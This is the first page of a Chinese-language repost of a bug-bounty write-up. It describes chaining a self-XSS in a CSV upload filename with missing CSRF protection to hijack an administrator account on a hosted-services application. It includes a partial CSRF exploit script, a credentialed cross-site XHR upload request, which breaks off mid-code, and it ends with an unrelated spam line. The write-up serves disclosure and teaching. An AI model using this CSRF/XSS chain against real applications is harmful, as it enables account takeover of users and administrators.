歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

從XSS漏洞到四步CSRF利用實現賬戶劫持

來源:本站整理 作者:佚名 時間:2019-05-29 TAG: 我要投稿


作者前不久在HackerOne上參加了一個漏洞眾測邀請項目,目標測試應用(系統)的功能是為一些企業托管相關服務,普通用戶可以通過該系統進行注冊,然后使用這些服務。所以,該應用中會涉及到很多用戶的敏感信息處理操作。后來,作者由一個XSS漏洞入手,發現了上傳功能中存在的四步CSRF漏洞隱患,最終經過構造實現了目標應用的管理員賬戶劫持。
在上傳文件名處發現XSS漏洞
項目開始前兩天,我就發現了幾個中危漏洞,并對它們做了一些分析標記,經深入研究之后,我意識到只要利用一個XSS漏洞,就能非常容易地實現提權。另外,由于更改用戶注冊郵箱時,目標應用沒有諸如向郵箱發更改鏈接或輸入當前密碼的驗證手段,所以綜合漏洞利用,可形成賬戶劫持。為此,我花了好多時間去挖XSS漏洞。
但難處在于,由于目標應用對用戶輸入做了特殊字符過濾處理,所以貌似很難發現XSS漏洞。之后某天晚上,在繼續測試過程中,我注意到,目標應用可以上傳CSV文件來導入用戶信息,這個功能估計值得深挖。于是,我在上傳CSV文件中構造了一些特殊字符,但還是被過濾掉了。接著,我又從CSV文件名入手,在其中構造了XSS 語句:
.csv
終于實現了alert的窗口彈出!好了,大功告成。
XSS綜合CSRF的嘗試
但在后續分析中,我意識到即使構造的文件名XSS是持久型的,這個XSS漏洞目前只能在CSV文件上傳時實現觸發。也就是說,在CSV文件上傳時,應用未做相關編碼過濾處理,但文件上傳到系統服務端后是受編碼過濾的。因此來看,這個XSS漏洞目前也僅只是一個Self-XSS,是不在漏洞認可范圍內的。盡管我試了很多XSS Payload,但還是不能繞過上傳后的服務端過濾機制,無法轉變這種Self-XSS
此時,我只有把它暫時放一放,希望在后續測試中能發現繞過方法或其它利用方式。接下來,在繼續測試后,我發現目標應用竟然沒有CSRF防護機制,所以,我就想到,能不能用CSRF請求來觸發這個Self-XSS呢?于是,我就立馬動手編寫了一個CSRF請求腳本,如下:
html>
    body>
    script>history.pushState('', '', '/')script>
      script>
        var uploadId = UPDATE_THIS_WITH_ID;
        function submitRequest() {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", `https://company.com/users/uploadFile?uploadId=${uploadId}`, true);
            xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
            xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
            xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------1566359571913061724703232384");
            xhr.withCredentials = true;
            var body = "-----------------------------1566359571913061724703232384\r\n" +
                "Content-Disposition: form-data; name=\"uploadedFile\"; filename=\".csv\"\r\n" +
                "Content-Type: text/csv\r\n" +

[1] [2] [3] [4]  下一頁

【聲明】:黑吧安全網(http://www.pcpbjo.tw)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        云南快乐十分前三电视